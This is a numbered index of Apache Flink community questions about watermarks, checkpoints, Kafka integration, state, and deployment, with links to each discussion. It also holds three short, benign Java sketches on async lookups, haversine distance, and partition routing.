118. [Watermarks are tied to parallelism, which is too global; I would like to assign watermarks per keyed stream after keyBy — is there a good practice for this?](https://t.zsxq.com/q7myfAQ)

119. [What is the difference between reading a file's contents as a DataStream versus a DataSet? Are both read record by record?](https://t.zsxq.com/rB6yfeA)

120. [Any Kylin materials, or tuning experience?](https://t.zsxq.com/j2j6EyJ)

121. [Flink first reads a configuration table via JDBC into a stream, while additions and changes to that configuration arrive from Kafka; how do I turn the two streams into one configuration stream? I used connect, then failed to turn it into a broadcast variable before merging with the entity stream, and the merge throws Exception in thread "main" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV)

122. [Flink exactly-once with Kafka 0.11.0 and a sink based on FlinkKafkaProducer, checkpointing every five minutes; but once the checkpoint starts, the system freezes completely. With at-least-once, a checkpoint finishes within a minute, yet now after ten minutes there is no progress at all — where is it stuck?](https://t.zsxq.com/RFQNFIa)

123. [Flink state lives in memory by default (or can be set to RocksDB or HDFS), while a checkpoint periodically stores the state as of some instant and can be kept on HDFS or RocksDB — is that the right understanding?](https://t.zsxq.com/NJq3rj2)

124. [In Flink async I/O, what is the difference between the two forms in the image below? Why add CompletableFuture.supplyAsync? I do not quite understand](https://t.zsxq.com/NJq3rj2)
 
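Question 124 asks what `CompletableFuture.supplyAsync` adds in Flink's async I/O examples. The distinction is whether the client call blocks the calling thread. A minimal plain-Java sketch of that difference, with no Flink dependency (`blockingLookup` is a hypothetical stand-in for a database or Redis client call, not from the question):

```java
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class AsyncLookupSketch {
    // Stand-in for a blocking client call (in a real job: a DB/Redis lookup).
    static String blockingLookup(String key) {
        try { Thread.sleep(10); } catch (InterruptedException e) { Thread.currentThread().interrupt(); }
        return key.toUpperCase();
    }

    public static void main(String[] args) throws Exception {
        ExecutorService pool = Executors.newFixedThreadPool(4);
        // Calling blockingLookup(...) directly would block the caller thread
        // (in Flink: the thread invoking asyncInvoke), serializing all lookups.
        // supplyAsync moves the blocking call onto the pool, so many lookups
        // can be in flight concurrently; each future completes when its lookup does.
        CompletableFuture<String> f =
                CompletableFuture.supplyAsync(() -> blockingLookup("order-1"), pool);
        f.thenAccept(v -> System.out.println("looked up: " + v));
        f.get(); // wait only so this demo does not exit early
        pool.shutdown();
    }
}
```

If the client already offers a truly asynchronous API with callbacks, the callback can complete the future directly and no extra thread pool is needed; `supplyAsync` is mainly the escape hatch for blocking clients.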
126. [A computation scenario: consume two data sources from Kafka, both of whose records carry a time-range notion; the computation must match the two time ranges and emit a new record on a match. Which tool fits better, Flink Table or CEP? My earlier approach converted both streams to tables and joined them, after over windows, into a new table; the job OOMs shortly after starting.](https://t.zsxq.com/rniUrjm)

127. [For an internet company, or a business system, how should comprehensive monitoring be built? Are there mature solutions to learn from, and what metrics should be measured?](https://t.zsxq.com/vRZ7qJ2)

128. [How to study Flink, or other big-data components, in depth, to be more competitive for a big-data (computation-side) job in the autumn recruiting season?](https://t.zsxq.com/3vfyJau)

129. [In OPPO's real-time warehouse, both the detail layer and the summary layer sit in Kafka, and the relational databases' real-time data is also extracted into the Kafka ODS. When building the warehouse, three or four large business tables must be joined, and the business tables change — are those large tables read from the Kafka ODS? Can a real-time warehouse join several large tables?](https://t.zsxq.com/VBIunun)

130. [Is there a way to convert a Tuple type to a JSON string? The scenario: when results are stored to the sink, I want them as JSON so applications can parse them easily. If a Tuple is hard to turn into JSON, what data format should be stored in the sink instead?](https://t.zsxq.com/vnaURzj)

140. [Does the end-to-end guarantee mean that if the processing program in the middle crashes, the messages of that failed batch are not lost, and after the program restarts it processes the previously unprocessed messages again?](https://t.zsxq.com/J6eAmYb)

141. [About Flink DataStream windows: say I use a tumbling window to count distinct users over a week; with normal watermark triggering, the computation only fires when the window's end time is reached, so the metric appears a week later. Can I trigger a computation every hour, each time counting the distinct elements that have arrived in the window up to the current time?](https://t.zsxq.com/7qBMrBe)

142. [Is FLIP-16 Loop Fault Tolerance about the current checkpoint mechanism being unable to tolerate faults in stream loops? Has this problem been solved yet?](https://t.zsxq.com/uJqzBIe)

143. [The requirement now: per-key cumulative daily values, output once a minute — for example, each user's cumulative clicks today. Is DataStream or the Table API more convenient for this?](https://t.zsxq.com/uZnmQzv)

144. [A project that runs in local IDEA keeps erroring on the standalone cluster; error screenshot below — what is the cause?](https://t.zsxq.com/BqnYRN7)

145. [If, say, a Flink cluster is brought up on k8s, will the Kafka or HDFS data sources live on the same cluster, or will separate HDFS/Kafka clusters be started?](https://t.zsxq.com/7MJujMb)

146. [With the Flink Kafka sink's FlinkFixedPartitioner assignment strategy, when the parallelism is smaller than the topic's partition count, each parallel instance writes to one fixed partition — so some partitions receive no data at all?](https://t.zsxq.com/6U7QFMj)

147. [Event time, a five-minute window sliding every five seconds, with the watermark likewise based on event time and a delay of one minute. Suppose the stream starts at 12:00 and no data at all is produced between 12:07 and 12:09 — i.e. the stream looks like ... (12:07:00,xxx),(12:09:00,xxx) ... — does that mean windows such as [12:02:05-12:07:05] and [12:02:10-12:07:10] only fire once the 12:09:00 record has arrived?](https://t.zsxq.com/fmq3fYF)

148. [Using Flink 1.7, consuming a certain (protobuf-format) message throws Caused by: org.apache.kafka.common.KafkaException: Record batch for partition 
Notify-18 at offset 1803009 is invalid, cause: Record is corrupt. How can the corrupted message be skipped so consumption continues with the next and the business is not interrupted? The Kafka connectors page of the docs says that returning null from DeserializationSchema.deserialize(...) makes Flink skip the message, yet the exception is still thrown](https://t.zsxq.com/MRvv3ZV)

149. [Could you find time to write up the principles of Flink watermarks with examples? I have never understood what data out-of-orderness and lateness really mean in event-time processing](https://t.zsxq.com/MRJeAuj)

150. [The principles of RPC communication in Flink, with explanations of the classes involved — is there a systematic, detailed article? If so, please share; thanks](https://t.zsxq.com/2rJyNrF)

151. [How can event-time processing be used in Flink without watermarks? I hit problems using session windows: figure one, based on processing time, shows in testing that sessions are per keyBy (user); figure two, based on event time, turns out — whether my usage is wrong or not — to produce a global session rather than per-key (per-user) ones. How should this be changed?](https://t.zsxq.com/bM3ZZRf)

152. [For a real-time Flink computation platform in YARN mode: how is log collection done, why do checkpoints fail, what needs to be done after alert handling, and how is job monitoring done?](https://t.zsxq.com/BMVzzzB)

153. [Is there data comparing Flink and JStorm performance in different application scenarios? Most of what can be found online compares Flink with Storm; the comparison chart on the JStorm site does not feel very useful as a reference — it was probably made against a rather early Flink version.](https://t.zsxq.com/237EAay)

154. [Why does State store nothing when I use a SessionWindows.withGap window — I add one each time, and reads come back null — while switching to TimeWindow works fine?](https://t.zsxq.com/J6eAmYb)

155. [A question: how can distinct metrics be computed in Flink DataStream stream processing? 
The official docs only mention a distinct concept for batch processing.](https://t.zsxq.com/y3nYZrf)

156. [A very complete article comparing and analyzing the Flink, Spark Streaming, and Storm frameworks](https://t.zsxq.com/qRjqFY3)

157. [The paper on structured_streaming](https://t.zsxq.com/Eau7qNB)

158. [The ZooKeeper cluster switched leader, the Flink cluster job restarted, and then there was no data input or output at all — where should I start to solve this?](https://t.zsxq.com/rFYbEeq)

159. [I would like to ask how a datastream can be joined with static data](https://t.zsxq.com/nEAaYNF)

160. [A clock problem caused us to receive tomorrow's data; what is a good way to handle this? I have seen people set a maximum jump threshold: if the current data time minus the historical maximum exceeds the threshold, do not update. How should watermarks be designed sensibly — any experience to share?](https://t.zsxq.com/IAAeiA6)

161. [How do people make Flink query a database on a schedule?](https://t.zsxq.com/EuJ2RRf)

162. [Our company has an idea: provide a page where users choose the source and sink and fill in a SQL statement, and the backend generates a Flink job and submits it to the cluster. It is a bit like Huawei's data platform — point-and-click operation on a page, with the backend automatically producing results from the configuration. As far as you know, can this be implemented, and how? Any good line of thought — I currently have no idea where to start](https://t.zsxq.com/vzZBmYB)

163. [Please explain the HA mechanism of flink on yarn](https://t.zsxq.com/VRFIMfy)

164. [In ordinary stream processing and in CEP, watermarks can be set on event time; sometimes a relatively large value is needed, and the memory pressure becomes significant. Is there a way to avoid JVM heap memory and use off-heap memory or another cache instead — ideally with a cache mechanism — to cope with high-traffic peaks?](https://t.zsxq.com/FAiiEyr)

165. [A Flink SQL question: I have two aggregated stream tables A and B, and A joined with B yields table C. When setting the state TTL, is it set directly on C, or is it better to set it on A and B?](https://t.zsxq.com/YnI2F66)

166. [Would rewriting Spark jobs in Flink be very complex, and how large is the gap between the two in SQL support?](https://t.zsxq.com/unyneEU)

167. [Flink allowedLateness causes the window to fire multiple times, and in the end the data is consumed repeatedly; the data is written to ES — how should this kind of problem be handled?](https://t.zsxq.com/RfyZFUR)

168. [With taskmanager.numberOfTaskSlots: 4 there is no problem, but the CPU does not ramp up — only about 30% is used; so I set taskmanager.numberOfTaskSlots: 8, and then it errors that one of my custom classes cannot be found, and Kafka data is no longer consumed. Why? What CPU utilization is appropriate? Is slot count equal to CPU count the best configuration? How many Kafka partitions are appropriate — is matching slots and parallelism best?](https://t.zsxq.com/bIAEyFe)

169. [The requirement: each log line is split into nine needed fields, and five metrics are computed over different combinations of those nine fields. Approach one, my current one: over the nine split fields, open a five-minute window sliding every minute, do a reduce for dedup, then a map to take the needed fields, then filter, then open another five-minute/one-minute sliding window to compute and save results. The problem: the first sliding window computes five minutes of data every minute, so within the second window's five-minute range there are many repeats, and this approach duplicates data. Approach two: over the nine split fields, open one five-minute/one-minute sliding window and do all the filtering and aggregation inside the process method — but at peak there are four million records per minute, and I worry Flink cannot keep up at peak with this approach](https://t.zsxq.com/BUNfYnY)

170. [Tables a, b, and c; a and c carry eventtime. Joining a with c directly works, but joining a with b and then with c errors — what is going on?](https://t.zsxq.com/aAqBEY7)

171. [My custom source looks like figure one and is used as in figure two; why, no matter what value 
the parallelism of sum.print().setParallelism(2) (figure 2) is set to, is the final result always like this?](https://t.zsxq.com/zZNNRzr)

172. [I just started with Flink, so pardon any badly posed questions: 1. Why is Flink said to be stateful computation? 2. What is this state? 3. Where is the state stored?](https://t.zsxq.com/i6Mz7Yj)

173. [We use Flink 1.8.1, flink on yarn, Hadoop 2.6.0. The code is a simple tumbling-window counting function, but it errors at startup, as in the image. (2) I then switched the Flink version to 1.7.1 and resubmitted to the 2.6.0 YARN platform, and it runs normally. (3) Our test cluster runs Hadoop 3.0; packaging the program again with Flink 1.8.1 and submitting to the 3.0 YARN platform also runs normally. It looks like an incompatibility between Flink 1.8.1 and YARN 2.6.0](https://t.zsxq.com/vNjAIMN)

174. [I use MemoryStateBackend as the StateBackend; how does State release memory? For example, I keep historical state information in a ValueState inside a function, and I never release the historical state manually — will the program release it automatically, or does it stay resident in memory?](https://t.zsxq.com/2rVbm6Y)

175. [Could you provide some Apache Beam learning materials? Thanks](https://t.zsxq.com/3bIEAyv)

176. [Do Flink's DataSet or DataStream support indexed lookup and deletion, like a Spark RDD? If not, what should they be converted into?](https://t.zsxq.com/yFEyZVB)

177. [About Flink state: can it be used like a database — something like an in-memory database — to hold business data during processing? If it counts as a database, is it a distributed one? Or does it only count when the RocksDB storage backend is used? Is the supported per-store size bounded only by the local machine's disk size? And if disk storage is used, is efficiency or performance affected?](https://t.zsxq.com/VNrn6iI)

178. [I built an HTTP sink here, intending to send data in batches, but right now the send can only be triggered by a count, so the last few records never trigger a send — is there any way around this?](https://t.zsxq.com/yfmiUvf)

179. [How can periodic deduplicated counting be done — that is, window by time, dedup by id within the window, and count the result? Much appreciated. I have tried quite a few things and found no simple, direct way](https://t.zsxq.com/vNvrfmE)

180. [I have a job using the elastic search sink, configured for bulk writes of 5000 at a time, but ES monitoring shows only about 500 inserts per second. Is this related to the bulkprocessor's currentrequest being 0?](https://t.zsxq.com/rzZbQFA)

181. [Any material on deploying Flink with Docker?](https://t.zsxq.com/aIur7ai)

182. [When explaining the StreamGraph construction process for KeyBy, why is keyBy's ID 6? By the earlier explanation, the ID is a static variable incremented by one on each access, so I would expect 3 — am I misunderstanding?](https://t.zsxq.com/VjQjqF6)

183. [Is there a plan for a source-code analysis of the Execution Graph?](https://t.zsxq.com/BEmAIQv)

184. [Could you share, at the code level, how the physical execution graph divides tasks, how tasks execute, and how data is passed between them?](https://t.zsxq.com/vVjiYJQ)

185. [The structure diagrams of the Flink source tree and of this learning project](https://t.zsxq.com/FyNJQbQ)

186. [In Flink 1.8, how can external UDF jars be loaded dynamically?](https://t.zsxq.com/qrjmmaU)

187. [How do different slots within the same Task Manager interact? For example, when the source finishes processing and hands records to map, if they are in different slots with mutually isolated memory, how do they exchange data? 
My guess is via serialization and deserialization of objects, over the network](https://t.zsxq.com/ZFQjQnm)

188. [Do you have this kind of business scenario? Flink reads data from Kafka, and each record carries the id of MongoDB table A; at map time I use Flink's async I/O to connect to table A, query field 1 from it, then based on field 1 another async I/O query to table B for field 2, then based on field 2 to table C for field 3... For a business scenario like this, with a few more such chains of logic, what scheme would be best?](https://t.zsxq.com/YBQFufi)

189. [Today, running a Flink program locally consuming data from a socket, only two records in a row could be consumed; the third is never consumed by Flink](https://t.zsxq.com/vnufYFY)

190. [The source data is filtered into two streams; each then gets its event time and watermark extracted and a time window applied. In my test, one stream has no data, and the other stream's data, judging by the logs, reaches the window operation and goes no further — it seems the window never gets triggered](https://t.zsxq.com/me6EmM3)

191. [Is anyone doing Flink CEP — any materials?](https://t.zsxq.com/fubQrvj)

192. [A question about BucketingSink writing across clusters: if the job runs on Hadoop cluster A, reads data from Kafka, processes it, and writes to Hadoop cluster B, then even with core-site.xml and hdfs-site.xml copied into the code's resources and paths of the form hdfs://hadoopB/xxx, it reports java.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink. Does Flink not support this cross-cluster writing?](https://t.zsxq.com/fEQVjAe)

193. [I would like to ask how data can be sampled from a DataStream or DataSet in Flink](https://t.zsxq.com/fIMVJ2J)

194. [A Flink job OOMs frequently — what might cause it? The processing pipeline only parses 15+ fields and reads some Redis data, etc.; the TM is configured with 10 g. The business backfills data at night, and QPS can reach about 2500](https://t.zsxq.com/7MVjyzz)

195. [I see that Flink 1.8 state expiry only supports Processing Time; if I use Event time, does state then never expire?](https://t.zsxq.com/jA2NVnU)

196. [I want to compute, every hour, the average of an attribute from midnight today up to the current time — how should such a time window be defined?](https://t.zsxq.com/BQv33Rb)

197. [Deserializing a class inside a Flink task throws ClassNotFoundException, yet the class is in the jar — has anyone run into this situation?](https://t.zsxq.com/nEAiIea)

198. [When constructing the StreamGraph, why are transforms of the PartitionTransformation kind added as virtual nodes rather than real physical nodes?](https://t.zsxq.com/RnayrVn)

199. [Flink consumes Kafka data and writes it into HDFS; I use the BucketingSink to write the operator output to HDFS files, and query them via an external table created in Hive. But there is a problem: Hive cannot recognize the data in files still in-progress, while I want to query the incoming data in Hive in real time, and without producing many small files — how should this be handled?](https://t.zsxq.com/A2fYNFA)

200. [Flink single-machine cluster mode with one jobmanager and two taskmanagers; the machine has 24 cores. The job is a simple one moving messages that meet a condition from one Kafka topic to another; the topic has 30 partitions, and I set the program's default parallelism to 30. It currently consumes a bit over 20k records per second, which is not fast enough — how can the job's performance be improved?](https://t.zsxq.com/7AurJU3)

201. [Flink Metric source-code analysis](https://t.zsxq.com/Mnm2nI6)

202. [How should this passage of the official docs be understood? By the official example, is there keyed state — state managed and stored by Flink — only after keyBy? If source and map have no custom operator 
state, is their state simply not saved?](https://t.zsxq.com/iAi6QRb)

203. [I want to use Flink for business monitoring and alerting, and it must support dynamically added CEP rules — should Flink CEP be used directly, or Siddhi CEP? Are there related materials to learn from? Thanks!](https://t.zsxq.com/3rbeuju)

204. [Are there any Java-side demos covering watermarks and triggers?](https://t.zsxq.com/eYJUbm6)

205. [Recently this occasionally happens in production: of 40 parallel subtasks, one keeps failing its CheckPoint while the other 39 all complete their CheckPoints at the millisecond level — how can this be localized? Another question: CheckPoint time splits into three parts, Checkpoint Duration (Async), Checkpoint Duration (Sync), and end-to-end minus the sync and async times — what does each of the three cover, and if any one of the three steps takes long, how should it be optimized?](https://t.zsxq.com/QvbAqVB)

206. [I have a scenario that depends heavily on the order of the consumed data. Much was done on the producing side — changing Kafka to a single partition and many other attempts — yet what is consumed is still out of order. Can processing be done on the Flink consumption side to guarantee the order of the processed data?](https://t.zsxq.com/JaUZvbY)

207. [A requirement like computing today's PV and UV in real time, using source->keyby->window->trigger->process, with UV computed via ValueState inside process — the question is: is all of one day's data in this window cached in Flink? If the daily volume is a bit large, this implementation has a problem — is there another line of thought for implementing it?](https://t.zsxq.com/iQfaAeu)

208. [Flink annotations source-code analysis](https://t.zsxq.com/f6eAu3J)

209. [How to monitor Flink's TaskManager and JobManager](https://t.zsxq.com/IuRJYne)

210. [A question: in real stream computation, is the parallelism set the same as the Kafka topic's partition count?](https://t.zsxq.com/v7yfEIq)

211. [If we wrap Flink's logs in our own platform interface, how do we fetch the job Manager, taskManager, and the user's own program logs — is there an API, or do we need to collect them into ELK with Flume ourselves?](https://t.zsxq.com/Zf2F6mM)

212. [I would like to ask how PV/UV is usually computed with Flink — UV stored in Redis? 
If every UV is stored in Redis, won't it blow up?](https://t.zsxq.com/72VzBEy)

213. [About Flink's checkpoint mechanism with multiple sources: the stream that has seen barrier n is temporarily held back, and records received from the other streams are not processed but put into an input buffer. What happens if the buffered records exceed the input buffer's size? It cannot buffer indefinitely — and if one of the streams simply never has data, doesn't the whole process get stuck?](https://t.zsxq.com/zBmm2fq)

214. [The company wants to display order data and aggregated amounts in real time, interact with the front end, and have the live figures pushed to the front end and rendered as a line chart. What would the technology selection for such a scenario look like — the storage of the data, the storage of the intermediate aggregates, and the form in which the front end is notified?](https://t.zsxq.com/ZnIAi2j)

215. [May I ask what is stored in a checkpoint?](https://t.zsxq.com/7EIeEyJ)

216. [My requirement is to compute, in real time, the distance between the current vehicle and the one ahead, using latitude/longitude. About 6000 vehicles, one coordinate record every 10 seconds. The place where the GPS stream is joined with itself is extremely slow at checkpoint time — several minutes each time; the checkpoint state backend is rocksDB. Is there a better scheme? Would implementing something like a last_value function to take each vehicle's latest coordinates before joining work, or a 10-second sliding window emitting each vehicle's latest coordinates and then joining — is that workable?](https://t.zsxq.com/euvFaYz)

217. [Can Flink, at startup, be given a point in time from which to restore the Kafka data?](https://t.zsxq.com/YRnEUFe)

218. [We have a production problem: many business jobs read a certain Hive table, but while that Hive table is being written, readers have occasionally seen the table's data as empty — how can this be solved?](https://t.zsxq.com/7QJEEyr)

219. [Building a platform to monitor Flink using InfluxDB and Grafana](https://t.zsxq.com/yVnaYR7)

220. [Flink consumes two different Kafka topics and then joins them. If event time is used, must both topics set watermarks? If only topic A's watermark is set and topic B's is not, what effect does that have?](https://t.zsxq.com/uvFU7aY)

221. [A question: my Flink program fails after running for a while with this error, and I have spent many days unable to localize it. The checkpoint interval is 5 seconds; 20 seconds does not help either. Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn)

222. [What advantages does Flink's backpressure mechanism have over Storm's? Question 2: if one Flink node fails, does that affect the other nodes' normal work, or does the Checkpoint fault-tolerance mechanism move the tasks to other nodes to run?](https://t.zsxq.com/yvRNFEI)

223. [While verifying checkpoints I hit this problem: for both keyed state and operator state, state data can be restored with the default or a specified uid, but when uidHash is specified the state data cannot be restored — please help explain. I operate on state by implementing the CheckpointedFunction interface, overriding snapshotState and initializeState and working inside those two methods, then have the program throw an exception on a timer; I observe that with uidHash specified, context.isRestored() in the snapshotState() method is false, and I do not quite understand the concrete reason](https://t.zsxq.com/ZJmiqZz)

224. [Every record in Kafka must be matched against all the data in ES (which grows dynamically), with some additional operations after the match — is there a feasible scheme for this?](https://t.zsxq.com/mYV37qF)
 
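Question 216 computes the distance between vehicles from latitude/longitude pairs. That distance computation itself is independent of Flink; a minimal haversine sketch in plain Java (the class and method names are my own, not from the question):

```java
public class HaversineSketch {
    static final double EARTH_RADIUS_M = 6_371_000.0; // mean Earth radius in meters

    // Great-circle distance in meters between two (lat, lon) points given in degrees.
    static double distanceMeters(double lat1, double lon1, double lat2, double lon2) {
        double dLat = Math.toRadians(lat2 - lat1);
        double dLon = Math.toRadians(lon2 - lon1);
        double a = Math.sin(dLat / 2) * Math.sin(dLat / 2)
                 + Math.cos(Math.toRadians(lat1)) * Math.cos(Math.toRadians(lat2))
                 * Math.sin(dLon / 2) * Math.sin(dLon / 2);
        return 2 * EARTH_RADIUS_M * Math.asin(Math.sqrt(a));
    }

    public static void main(String[] args) {
        // One degree of latitude is roughly 111 km.
        System.out.printf("%.0f m%n", distanceMeters(39.0, 116.0, 40.0, 116.0));
    }
}
```

In a Flink job this function would sit inside the join or process function that pairs each vehicle with the one ahead; keeping it pure makes it trivial to unit-test outside the cluster.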
225. [Flink consumes Kafka data with a checkpoint every minute. Suppose the first checkpoint completes and the program dies before the next one; the Kafka offset is still what the first checkpoint recorded, so restarting the program re-consumes data, doesn't it? What, then, is Flink's exactly-once consumption semantics?](https://t.zsxq.com/buFeyZr)

226. [The program frequently reports Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out — heartbeat timeouts, roughly ten times a day. Is not enough memory given, or is it caused by network jitter?](https://t.zsxq.com/Znyja62)

227. [Are there any articles offering performance-optimization guidance?](https://t.zsxq.com/AA6ma2Z)

228. [How can Flink's Kafka consumption be monitored for normality — any good method?](https://t.zsxq.com/a2N37a6)

229. [Following the official wordcount example, I started a thread in the main function, originally intending to update some configuration periodically; to test feasibility, I just print a line in the thread function. The test result is that it does not work — the thread never seems to execute at all. What is the reason? As I understand it, doesn't JobClient execute the main function via reflection? When the main function executes, why is the thread's print function not executed?](https://t.zsxq.com/m2FeeMf)

230. [I want to retain the several most recently completed checkpoints — is that done by setting state.checkpoints.num-retained, and how is it used?](https://t.zsxq.com/EyFUb6m)

231. [Are there any real-time ETL warehouse cases — say, a streaming join of twenty fact tables?](https://t.zsxq.com/rFeIAeA)

232. [Why does the stream job I throw at Flink immediately go to finished?](https://t.zsxq.com/n2RFmyN)

233. [Are there examples of machine-learning algorithms on Flink, beyond those in the official flink examples and what is already in flink ml?](https://t.zsxq.com/iqJiyvN)

234. [If I want to extend SQL keywords, for example to add support for some data constructs, what is the line of thought? Right now it feels like Calcite itself must be changed (having just touched Flink, that seems far too hard)](https://t.zsxq.com/uB6aUzZ)

235. [I want to count the occurrences of each type every 5 seconds; right now nothing is output — where is the problem?](https://t.zsxq.com/2BEeu3Z)

236. [I write data into hbase from Flink — is there a demo of the kind that bulk-writes hfiles directly?](https://t.zsxq.com/VBA6IUR)

237. [How can Kafka consumption be monitored for lag and message backlog? Do you have a demo? Is this a hand-written Spring Boot monitor, or what?](https://t.zsxq.com/IieMFMB)

238. [Is there an example of computing PV and UV?](https://t.zsxq.com/j2fM3BM)

239. [How can a window operator's window type and length be modified dynamically through a control stream?](https://t.zsxq.com/Rb2Z7uB)

240. [Could you publish an edition on remote debugging of Flink? The materials online are full of pitfalls](https://t.zsxq.com/UVbaQfM)

241. [In companies, is Flink development done more in Java or in Scala?](https://t.zsxq.com/AYVjAuB)

242. [Flink tasks run in a YARN environment; when YARN's resourcemanager fails over between active and standby, all the Flink tasks fail, while MR tasks run normally. The error message: AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered . 
AM should re-register — what is the cause, and how should it be handled?](https://t.zsxq.com/j6QfMzf)

243. [A distributed question: say a metric count is computed across Flink's multiple TaskManagers, with two records on TM1 and one record on TM2 — how does the program compute the answer 3? What is the principle?](https://t.zsxq.com/IUVZjUv)

244. [Right now some of our company's SQL queries against Oracle are especially slow, because the query conditions are many; is there any method — for example based on big-data components — to speed the queries up?](https://t.zsxq.com/7MFEQR3)

245. [I would like to ask whether anyone has built a system where Flink synchronizes configuration to do custom computation? Or is there any good advice? The business ask is that business users can self-configure computation rules for stream computation](https://t.zsxq.com/Mfa6aQB)

246. [I have a real-time data-sync task here that runs normally all day, but after around 2 a.m. no data is sunk into mysql. At night some offline tasks and some dataX tasks sync data into mysql. Yet everything about the task looks normal — checkpoints are fast at 20ms, data is consumed normally. I looked at the yarn logs: no error at all. The custom sink also has log printing configured, but nothing is in the log. How can this kind of thing be localized quickly?](https://t.zsxq.com/z3bunyN)

247. [Are there case materials on Flink handling abnormal data?](https://t.zsxq.com/Y3fe6Mn)

248. [How can a global variable be passed around in Flink?](https://t.zsxq.com/I2Z7Ybm)

249. [For a 4-core 16G Flink taskmanager, what kind of server does a dedicated standalone YARN need — nothing else required, just the scheduling part?](https://t.zsxq.com/iIUZrju)

250. [A share on side-output](https://t.zsxq.com/m6I2BEE)

251. [Can monitoring Flink with InfluxDB + Grafana be configured with alerting? Or is prometheus the more powerful choice?](https://t.zsxq.com/amURFme)

252. [We hit a problem in production: a stateful operator was given no uid, the code now must change, and that stateful operator can no longer restore normally — is there a way out? Can the uid the system previously auto-generated be obtained somehow?](https://t.zsxq.com/rZfyZvn)

253. [tableEnv.registerDataStream("Orders", ds, "user, product, amount, proctime.proctime, rowtime.rowtime"); — when registering a stream as a table like this, what do these two time attributes, proctime.proctime and rowtime.rowtime, each mean?](https://t.zsxq.com/uZz3Z7Q)

254. [I would like to ask: in flink on yarn session mode, the official submission example is flink run -c xxx.MainClass job.jar — how does this know which application on YARN is the Flink session's appid?](https://t.zsxq.com/yBiEyf2)

255. [Is there a detailed usage example of the Flink Netty Connector? 
Can a source built on Netty reply to messages directly, or can it only receive passively?](https://t.zsxq.com/yBeyfqv)

256. [Can jobs submitted with the Flink sqlclient be used in a production environment?](https://t.zsxq.com/FIEia6M)

257. [For batch processing writing back to MySQL, is tableEnv.sqlUpdate("insert into t2 select * from t1") unusable? How should t2, the sink table, be registered? Looking at what is JDBC-related, there are just two TableSinks: JDBCAppendTableSink for BatchTableSink and JDBCUpsertTableSink for StreamTableSink, and the former only accepts insert into ... values syntax. So my implementation first runs the select-from query to obtain a DataSet and then calls JDBCAppendTableSink.emitDataSet(ds), but that falls short of the sql-rule-any goal](https://t.zsxq.com/ZBIaUvF)

258. [A question: in stream mode, without writing the computation results to storage, is there some RESTful API through which Flink's results can be fetched?](https://t.zsxq.com/aq3BIU7)

259. [I now have a scenario where certain messages must be sent to a specified partition of a Kafka topic — how is that done?](https://t.zsxq.com/NbYnAYF)

260. [My job runs normally in IDEA, but submitted to the production cluster it reports Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V — how can this be solved?](https://t.zsxq.com/YfmAMfm)

261. [I hit a very strange problem: using streamingSQL, the timestamp is still normal while in the datastream, but printed after registering as a table it is eight hours short — do you happen to know the reason?](https://t.zsxq.com/72n6MVb)

262. [To ship some of the record logs Flink produces asynchronously to Kafka, what configuration is needed, and after configuring, does the cluster have to be restarted for it to take effect?](https://t.zsxq.com/RjQFmIQ)

263. [Hello — how is Flink 1.9's support for dimension-table joins coming along? Are there docs?](https://t.zsxq.com/Q7u3vzR)

264. [A question about this Flink SQL: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM *, with the window set in code as retractStream.timeWindowAll(Time.minutes(5)) — one global window, data written to hdfs. The result data is duplicated: two completely identical rows exist, such as (常州, 2283, 1566230703) — why is that?](https://t.zsxq.com/aEEA66M)

265. [I store checkpoints with rocksdb, directly on local disk, and after running in production for a while the checkpoint space grows larger and larger — how can it be made to clean itself up automatically?](https://t.zsxq.com/YNrfyrj)

266. [Under which user should Flink be started — root, or some other user?](https://t.zsxq.com/aAaqFYn)

267. [Can Flink read LZO files?](https://t.zsxq.com/2nUBIAI)

268. [How can data be iterated out of es quickly? All of our company's data is currently stored in Es, and I find every scan of data from it especially slow — do you have any good method?](https://t.zsxq.com/beIY7mY)

269. [If I want the data partitioned by one field, say f0, and each partition then processed with parallelism 1, how do I set that up?](https://t.zsxq.com/fYnYrR7)
 
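Question 259 asks how to route certain messages to a chosen partition of a Kafka topic; with the Flink Kafka producer this is done by supplying a custom partitioner, and the core of any such partitioner is a deterministic key-to-partition function. A minimal plain-Java sketch of that mapping (`String.hashCode` stands in for Kafka's murmur2 hash purely for illustration; the class name is my own):

```java
public class PartitionRouting {
    // Deterministic key -> partition mapping: records with equal keys always
    // land on the same partition, and the index is always in [0, numPartitions).
    // The mask clears the sign bit so a negative hashCode cannot yield a
    // negative modulo result.
    static int partitionFor(String key, int numPartitions) {
        return (key.hashCode() & 0x7fffffff) % numPartitions;
    }

    public static void main(String[] args) {
        int p1 = partitionFor("order-10001", 30);
        int p2 = partitionFor("order-10001", 30);
        System.out.println(p1 == p2);            // same key -> same partition
        System.out.println(p1 >= 0 && p1 < 30);  // always a valid index
    }
}
```

Wrapping a function like this in the connector's partitioner hook (rather than hashing inside the map operator) keeps the routing decision next to the sink, where the actual partition count is known.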
270. [Recently, while writing operators, Scala has been faster for Flink, and when implementing the onTimer path in a process operator, a Scala ListBuffer can be used to output a top-3 record; in Java, is the only option to take Flink's ListState out with the get() method and put it into an ArrayList?](https://t.zsxq.com/nQFYrBm)

271. [Could you publish some Flink 1.9 dimension-table join examples, including async and dimension-table caching?](https://t.zsxq.com/eyRRv7q)

272. [The flink kafka source is set to consume from the group's offsets. There is a problem: on the first start of the task, I find that Kafka's historical data is not consumed — consumption starts from current data — and only on the second start does it consume from the group's offset. Is there a way to make the first start of the task consume Kafka's historical data too?](https://t.zsxq.com/aMRzjMb)

273. [1. Using Flink to process offline data on a schedule, with a timestamp field, how do I get the per-minute maximum, similar to a stream-processing window? 2. If I want to implement batch-stream unification myself, is there a good direction for combining them — for example, letting stream processing use one of batch processing's operators?](https://t.zsxq.com/3ZjiEMv)

